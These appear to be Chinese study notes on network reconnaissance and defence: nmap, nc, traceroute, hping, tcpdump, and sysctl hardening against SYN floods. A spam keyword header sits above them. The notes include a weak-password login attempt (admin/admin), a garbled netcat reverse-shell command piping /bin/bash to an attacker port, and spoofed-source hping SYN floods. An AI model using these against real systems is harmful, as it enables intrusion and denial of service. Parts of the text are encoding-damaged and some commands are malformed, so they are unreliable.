第七色在线视频,2021少妇久久久久久久久久,亚洲欧洲精品成人久久av18,亚洲国产精品特色大片观看完整版,孙宇晨将参加特朗普的晚宴

fping參數(shù)

主機(jī)掃描命令

網(wǎng)絡(luò)安全技術(shù)定義

1.網(wǎng)絡(luò)入侵方式
踩點(diǎn),網(wǎng)絡(luò)掃描,查點(diǎn),提權(quán)等

1. tracert命令tracert www.jd.com 查ip地址
   

2. nmap命批量主機(jī)服務(wù)掃描令,得知某個(gè)路由里面的端口

3. 嘗試進(jìn)行暴力破解,發(fā)現(xiàn)登陸內(nèi)網(wǎng)http://10.202.4.73,是否能用弱口令進(jìn)行登陸,例如:admin/admin

4. 登陸到管理界面后,嘗試用nc命令進(jìn)行交互式shell操作,例如nc -10.68.104.6? 2005 -e/bin/bash監(jiān)聽黑客的2005接口,并將目標(biāo)機(jī)器的所有bash命令
   

5. 
   

SYN類型DDOS攻擊：服務(wù)器接收到連接請(qǐng)求（syn=j），將此信息加入backlog未連接隊(duì)列，導(dǎo)致隊(duì)列滿了丟棄掉正常的SYN請(qǐng)求，同時(shí)發(fā)送請(qǐng)求包給客戶（syn=k,ack=j+1），進(jìn)入SYN_RECV狀態(tài)。當(dāng)未收到客戶端的確認(rèn)包時(shí)，一直重發(fā)請(qǐng)求包，占用網(wǎng)絡(luò)帶寬，引起網(wǎng)絡(luò)堵塞甚至系統(tǒng)癱瘓。

減少syn和ack包的重試次數(shù)

????sysctl -w net.ipv4.tcp_synack_retries=3

????sysctl -w net.ipv4.tcp_syn_retries=3

SYN cookies技術(shù)

????sysctl -w net.ipv4.tcp_syncookies=1

增加backlog隊(duì)列

?????sysctl -w net.ipv4.tcp_max_syn_backlog=2048

關(guān)閉ICMP協(xié)議請(qǐng)求

?????sysctl -w net.ipv4.icmp_echo_ignore_all=1

netcat（nc）工具：在centos中通過yum search nc查找，然后安裝。 nc -z -v -n -w2 172.31.100.7 21-25 可以運(yùn)行在TCP或者UDP模式，默認(rèn)是TCP，-u參數(shù)調(diào)整為UDP。 z 參數(shù)在連接成功后立即關(guān)閉連接，不進(jìn)行數(shù)據(jù)交換；v 參數(shù)指詳細(xì)輸出；n 參數(shù)表示不要使用DNS反向查詢IP地址的域名。 這個(gè)命令會(huì)打印21到25所有開放的端口并且打印運(yùn)行在這個(gè)端口上服務(wù)的banner信息。Banner是一個(gè)文本，是一個(gè)你連接的服務(wù)發(fā)送給你的文本信息。但是，并不是所有的服務(wù)都會(huì)發(fā)送banner。

1、nmap -sP IP/24 查看這一段IP內(nèi)哪個(gè)主機(jī)的開放的 ICMP協(xié)議類型 ping掃描 2、nmap -sS [-p 端口范圍] IP 查看IP開發(fā)的TCP端口 TCP SYN掃描 tcp半開放掃描(沒有建立三次握手)(不會(huì)被服務(wù)檢測，例如Apache等) 默認(rèn)掃描0-1024端口及一些常用端口 3、nmap -sT [-p 端口范圍] IP TCP connect()掃描 TCP全開放掃描 4、nmap -sU IP UDP掃描 UDP協(xié)議掃描 有效透過防火墻策略

nmap -sP（ping掃描主機(jī)是否存活） x.x.x.0/24? ? <nmap -sP?61.135.169.0/24>

nmap -sS（TCP半開放掃描） -p（指定端口掃描范圍） [端口1]-[端口2] [目標(biāo)IP]????<nmap -sS -p 0-30000 192.168.5.7>

nmap -sT（TCP全開放掃描）?-p（指定端口掃描范圍） [端口1]-[端口2] [目標(biāo)IP]????<nmap -sT -p 0-30000 192.168.5.7>

nmap -sU（UDP掃描）?-p（指定端口掃描范圍） [端口1]-[端口2] [目標(biāo)IP]????<nmap -sU -p 0-30000 192.168.5.7>

tcp半開放掃描：發(fā)送SYN包但不建立第三次握手，不被目標(biāo)服務(wù)發(fā)現(xiàn) tcp全開放掃描：進(jìn)行三次握手，建立tcp連接

原理與traceroute一致，mtr另外可以看丟包率

路由掃描：查詢本機(jī)到另一個(gè)主機(jī)經(jīng)過的路由跳數(shù)及數(shù)據(jù)延遲情況。 tracerpute原理：traceroute 送出一個(gè)TTL（生存時(shí)間）是1的UDP數(shù)據(jù)包（每次送的的是3個(gè)40字節(jié)的包，包括源地址，目的地址和包發(fā)出的時(shí)間標(biāo)簽）到目的地，當(dāng)路徑上的第一個(gè)路由器收到這個(gè)數(shù)據(jù)包時(shí)，它將TTL減1變?yōu)?，并送回一個(gè)ICMP數(shù)據(jù)包，表示UDP數(shù)據(jù)包已經(jīng)執(zhí)行；接著再送出另一個(gè)TTL為2的數(shù)據(jù)包，發(fā)現(xiàn)第二個(gè)路由器，然后一直重復(fù)執(zhí)行該操作，直到某個(gè)數(shù)據(jù)包抵達(dá)目的地；因?yàn)樗x擇送達(dá)的port number（30000以上）是一般應(yīng)用程序都不會(huì)用的端口，所以在traceroute送出UDP數(shù)據(jù)包到目的地時(shí)，該目的主機(jī)會(huì)送回一個(gè)目的地址不可達(dá)的消息

hping 一 對(duì)制定端口發(fā)起TCP探測 ?二 偽造來源IP，模擬Ddos攻擊

Linux查看端口????netstat -l（監(jiān)聽）t（TCP）n（不顯示主機(jī)名）? ? <netstat -ltn>

Windows查看端口????netstat -ano

hping -p [端口] -S（發(fā)送SYN包） [目標(biāo)IP]?

-a（偽造發(fā)送IP） [偽造IP] ? ?<hping -p 22 -S 192.168.3.26 -a 192.168.3.27>

修改Linux內(nèi)核禁用ICMP報(bào)文????sysctl -w net.ipv4.icmp_echo_ignore_all=1

查看經(jīng)過某網(wǎng)絡(luò)設(shè)備包信息 ? ?tcpdump -n（不把主機(jī)IP轉(zhuǎn)換為名稱） -p（不讓網(wǎng)絡(luò)界面進(jìn)入混雜模式） -i[網(wǎng)卡名稱] src host（只顯示此IP包信息） [目標(biāo)IP] ? <tcpdump -np -ieth1 src host 192.168.3.56>?

hping安裝依賴了libpcap和libpcap-devel。 make出現(xiàn)錯(cuò)誤：net/bpf.h：沒有那個(gè)文件或目錄，未發(fā)現(xiàn)bpf-h，解決辦法：ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h；/usr/bin/ld:cannot find -ltcl，解決辦法：yum install tcl-devel；創(chuàng)建符號(hào)鏈接 "/usr/sbin/hping"文件已存在，解決辦法：使用 rm -rf ?/usr/sbin/hping* 刪除。 make install之后，出現(xiàn)Can't install the man page: /usr/local/man/man8 does not exis